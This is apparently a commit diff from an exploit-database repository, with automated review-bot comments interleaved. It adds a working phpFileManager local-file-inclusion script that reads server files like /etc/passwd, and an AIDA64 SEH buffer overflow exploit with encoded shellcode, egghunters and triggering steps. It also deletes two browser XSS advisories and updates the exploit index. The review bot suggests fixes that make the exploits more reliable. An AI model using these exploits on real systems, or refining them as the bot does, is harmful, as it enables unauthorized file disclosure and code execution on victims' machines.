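Review bot: `crack_password()` opens the wordlist as `dict = open(wordlist)`, shadowing the builtin and leaving the handle open if the md5 loop raises; `with open(wordlist) as words:` and iterating the file directly (`for line in words:`) gives the same result with the close guaranteed. The usage text printed in the option check tells the user to "Setup the variable TIME", but `TIME = 1` is a module constant with no command-line option, so that instruction cannot be followed without editing the script; either add an option or drop the sentence. `dump_salt()`, `dump_username()`, `dump_email()` and `dump_password()` are four copies of the same loop differing only in the column and accumulator, and each reassigns the module-level `flag` as a side effect, which makes the order of the four calls at the bottom load-bearing. The `r = session.get(url)` result is never read, and `termcolor` is a third-party dependency the header does not mention.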
@@ -0,0 +1,33 @@ +# Exploit Title: phpFileManager 1.7.8 - Local File Inclusion +# Date: 01.04.2019 +# Exploit Author: Murat Kalafatoglu +# Vendor Homepage: https://sourceforge.net/projects/phpfm/ +# Software Demo: https://phpfm-demo.000webhostapp.com/ +# Version: v1.7.8 +# Category: Webapps +# Tested on: XAMPP for Linux +# Description: Any user can read files from the server +# without authentication due to an existing LFI in the following path: +# http://target/index.php?action=3&fm_current_dir=%2Fetc%2F&filename=passwd + +# PoC + +#!/usr/bin/python + +import requests, sys + +print "\n[*] phpFileManager 1.7.8 LFI PoC By Murat Kalafatoglu" +print "[+] usage: python " + __file__ + " http://" +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) +ip_add = sys.argv[1] + +dr = raw_input('[+] Directory: aka /etc/\n') +fd = raw_input('[+] File : aka passwd\n') + +print "Exploiting....." +print '\n' + +exp = requests.get(""+ ip_add + "index.php?action=3&fm_current_dir=" + dr + "&filename=" + fd +"") +print exp.text \ No newline at end of file diff --git a/exploits/windows/local/46636.py b/exploits/windows/local/46636.py new file mode 100755 index 000000000..c057e044a --- /dev/null +++ b/exploits/windows/local/46636.py 
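Review bot: The request URL is built as `""+ ip_add + "index.php?..."` with no separator, so the script only works when the target argument ends with a slash, and the usage line `print "[*] Usage: poc.py "` does not say so (the placeholder after it appears to have been lost in rendering). `ip_add.rstrip("/") + "/index.php?action=3&fm_current_dir=" + dr + "&filename=" + fd` accepts both forms. The response is printed with `print exp.text` regardless of `exp.status_code`, so an error or login page is indistinguishable from file content; checking the status first would make the output meaningful.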
@@ -0,0 +1,138 @@ +#!/usr/bin/python # +# Exploit Title: AIDA64 Extreme 5.99.4800 - SEH Buffer Overflow (EggHunter) # +# Date: 2019-04-01 # +# Vendor Homepage: https://www.aida64.com # +# Software Link: http://download.aida64.com/aida64extreme599.exe # +# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe # +# Exploit Author: Peyman Forouzan # +# Tested Version: 5.99.4900 # +# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit # +# Special Thanks to my wife # +# The program has SEH Buffer Overflow in several places.(this code show one of them) # +# Note 1 : To optimize code, I've used a "stack pivot" that is the same in # +# (Extreme, Engineer, Network Audit) Editions. # +# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4800 # +# But the stack pivots in Business Edition are different. # +# Note 2 : All the old versions of the program that are available on the sites like soft32.com, # +# or in https://www.aida64.com/downloads/archive # +# have the same vulnerabily in different offsets (for example version 5.70.3800 ) # +# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions. # +# Steps : # +# 1- Run python code : Aida64.py ( Three files are created ) # +# 2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt # +# into "Display name" --> Ok # +# 3- Report --> Report Wizard ... 
--> Next --> paste in contents from the egghunter-winxp-win7.txt # +# or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next # +# --> Wait a minute --> Shellcode (Calc) open # +#---------------------------------------------------------------------------------------------------------# + +#------------------------------------ EGG Shellcode Generation --------------------------------------- + +bufsize = 292 + +#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg +egg = "w00tw00t" +egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71" +egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b" +egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43" +egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57" +egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75" +egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f" +egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43" +egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c" +egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33" +egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31" +egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31" +egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31" +egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58" +egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d" +egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52" +egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36" +egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43" +egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50" +egg += 
"\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33" +egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f" +egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31" +egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50" +egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72" +egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35" +egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f" +egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a" +egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73" +egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43" +egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44" +egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41" + +f = open ("egg.txt", "w") +f.write(egg) +f.close() + +#---------------------------------- EGG Hunter Shellcode Generation ------------------------------------ +egghunter = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7" +egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" +egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30" +egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b" +egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33" +egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f" +egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50" +egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d" +egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36" +egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64" +egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34" +egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75" +egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50" +egghunter += 
"\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31" +egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41" + +egghunter10 = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29" +egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" +egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41" +egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38" +egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50" +egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e" +egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54" +egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69" +egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f" +egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39" +egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72" +egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31" +egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39" +egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66" +egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78" +egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78" +egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a" +egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41" + +jmpback = "\xe9\xdc\xfe\xff\xff" # jmp back +nseh = "\xeb\xf9\x90\x90" # jmp Short back +seh = "\x40\x15\x40" # Overwrite Seh - Golden Pivot !! + +buffer = egghunter +buffer += "\x41" * (bufsize-len(buffer)-len(jmpback)) +buffer += jmpback +buffer += nseh +buffer += seh +print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer) +f = open ("egghunter-winxp-win7.txt", "w") +print "[+] File created!" 
+f.write(buffer)
+f.close()
+
+buffer = egghunter10
+buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
+buffer += jmpback
+buffer += nseh
+buffer += seh
+print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)
+f = open ("egghunter-win10.txt", "w")
+print "[+] File created!"
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/32517.html b/exploits/windows/remote/32517.html
deleted file mode 100644
index f3a55e5fc..000000000
--- a/exploits/windows/remote/32517.html
+++ /dev/null
@@ -1,11 +0,0 @@
-source: https://www.securityfocus.com/bid/31855/info
-
-Mozilla Firefox 3 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
-
-Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
-
-
-
-
-
-
\ No newline at end of file
diff --git a/exploits/windows/remote/32518.html b/exploits/windows/remote/32518.html
deleted file mode 100644
index 68e7390d4..000000000
--- a/exploits/windows/remote/32518.html
+++ /dev/null
@@ -1,11 +0,0 @@
-source: https://www.securityfocus.com/bid/31855/info
-
-Google Chrome 0.2.149 is prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
-
-Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
-
-
-
-
-
-
\ No newline at end of file
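Review bot: The header comment block at the top of this hunk is internally inconsistent about the build it describes: `# Tested Version: 5.99.4900 #` disagrees with the title line `AIDA64 Extreme 5.99.4800` and with Note 1, which refers to version 5.99.4800. One of the two numbers is presumably a typo; the header should name a single version so readers know which build the notes actually apply to. The file is a flat script with no enclosing function, and its hunk header is above in this chunk.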
diff --git a/files_exploits.csv b/files_exploits.csv
index 192411647..e6d0f9435 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10384,6 +10384,7 @@ id,file,description,date,author,type,platform,port
 46600,exploits/windows/local/46600.txt,"VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
 46601,exploits/windows/local/46601.txt,"VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
 46625,exploits/windows/local/46625.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)",2019-03-28,"Paolo Perego",local,windows,
+46636,exploits/windows/local/46636.py,"AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow",2019-04-02,"Peyman Forouzan",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -15678,8 +15679,6 @@ id,file,description,date,author,type,platform,port
 32491,exploits/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Remote Buffer Overflow",2008-10-16,"Thomas Pollet",remote,windows,
 32493,exploits/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,remote,windows,
 32515,exploits/linux/remote/32515.rb,"Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,remote,linux,443
-32517,exploits/windows/remote/32517.html,"Mozilla Firefox 3 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",remote,windows,
-32518,exploits/windows/remote/32518.html,"Google Chrome 0.2.149 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting Vulnerabilities",2008-10-21,"Muris Kurgas",remote,windows,
 32529,exploits/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",remote,multiple,
 32530,exploits/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap'/'.mime.type' Local Code Execution",2008-11-03,"Piotr Engelking",remote,linux,
 32548,exploits/linux/remote/32548.html,"Opera Web Browser 9.x - History Search and Links Panel Cross-Site Scripting",2008-10-30,"Stefano Di Paola",remote,linux,
@@ -41071,3 +41070,11 @@ id,file,description,date,author,type,platform,port
 46623,exploits/php/webapps/46623.txt,"BigTree 4.3.4 CMS - Multiple SQL Injection",2019-03-28,"Mehmet EMIROGLU",webapps,php,80
 46624,exploits/php/webapps/46624.txt,"Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection",2019-03-28,"Ahmet Ümit BAYRAM",webapps,php,80
 46629,exploits/linux/webapps/46629.txt,"CentOS Web Panel 0.9.8.789 - NameServer Field Persistent Cross-Site Scripting",2019-03-29,DKM,webapps,linux,
+46630,exploits/php/webapps/46630.txt,"Inout EasyRooms - SQL Injection",2019-04-02,"Ahmet Ümit BAYRAM",webapps,php,
+46631,exploits/php/webapps/46631.txt,"Inout RealEstate - 'city' SQL Injection",2019-04-02,"Ahmet Ümit BAYRAM",webapps,php,
+46632,exploits/php/webapps/46632.txt,"WordPress Plugin PayPal Checkout Payment Gateway 1.6.8 - Parameter Tampering",2019-04-02,"Vikas Chaudhary",webapps,php,
+46633,exploits/hardware/webapps/46633.html,"JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery",2019-04-02,"Vikas Chaudhary",webapps,hardware,
+46634,exploits/php/webapps/46634.py,"LimeSurvey < 3.16 - Remote Code Execution",2019-04-02,q3rv0,webapps,php,
+46635,exploits/php/webapps/46635.py,"CMS Made Simple < 2.2.10 - SQL Injection",2019-04-02,"Daniele Scanu",webapps,php,
+46637,exploits/php/webapps/46637.txt,"Fiverr Clone Script 1.2.2 - SQL Injection / Cross-Site Scripting",2019-04-02,"Mr Winst0n",webapps,php,
+46638,exploits/php/webapps/46638.py,"phpFileManager 1.7.8 - Local File Inclusion",2019-04-02,"Murat Kalafatoglu",webapps,php,